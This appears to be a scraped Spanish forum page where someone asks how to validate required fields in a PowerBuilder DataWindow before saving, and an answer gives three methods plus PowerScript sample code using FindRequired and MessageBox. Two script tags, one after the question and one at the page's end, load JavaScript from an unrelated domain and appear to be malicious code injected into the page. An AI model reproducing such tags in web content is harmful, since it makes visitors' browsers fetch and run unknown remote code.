Datawindow powerbuilder sql

Tengo mi tabla productos con 3 campos no nulos(código, nombre, precio)y un dw freeform para registrar, al momento de "GUARDAR" quisiera que me muestre un mensaje de los campos que faltan ingresar datos (que no me muestre el mensaje de error sql)para después ingresados poder guardar en la BD... Gracias

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.8840096045502284"></script>

1 Respuesta

Respuesta

Lo que deseas es validar los campos de un registro antes de guardar; para hacer esto hay varias maneras:

1.- Obtener los datos y verificando los valores de cada columna entes de guardar.

2.- En el objeto datawindow en Column Specification, en la columna "Validation Expression", validas que no sea nulo para las columnas que desees. Y en "Validation Message" escribes el mensaje que deseas que te muestre.

3.- En el objeto datawindow seleccionas las columnas que desea validar una por una, en sus propiedades en la ficha edit activas la propiedad "Required", luego en tu código antes de guardar:

http://powerbuilder-undiaalavez.blogspot.com/2011/02/validar-campos-de-un-datawindow-usando.html

long        ll_row      //Almacena la fila en donde se encuentra el campo con valor null.
integer     li_columna  //Almacena el numero de columna con valor null.
string      ls_colname  //Almacena el nombre de la columna con valor null.
string      ls_columna  //Almacena el mensaje de validación de la columna.
dw_1.AcceptText()
ll_row=1
li_columna = 0
dw_1.FindRequired(Primary!,ll_row, li_columna,ls_colname, True)
IF ll_row <> 0 THEN
      dw_1.SetColumn(li_columna)
      dw_1.ScrollToRow(ll_row)
      //Obtenemos el mensaje de validación obtenido.
      ls_columna= dw_1.describe(ls_colname+'.ValidationMsg')
      //Quitamos las comillas del mensaje de validación.
      ls_columna=left(ls_columna,len(ls_columna)-1)
      ls_columna=mid(ls_columna,2,len(ls_columna))
      dw_1.SetFocus()
      //Mostramos el mensaje de validación.
      messagebox("Verifique",ls_columna,Exclamation!)
END IF
<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.07806155241631396"></script>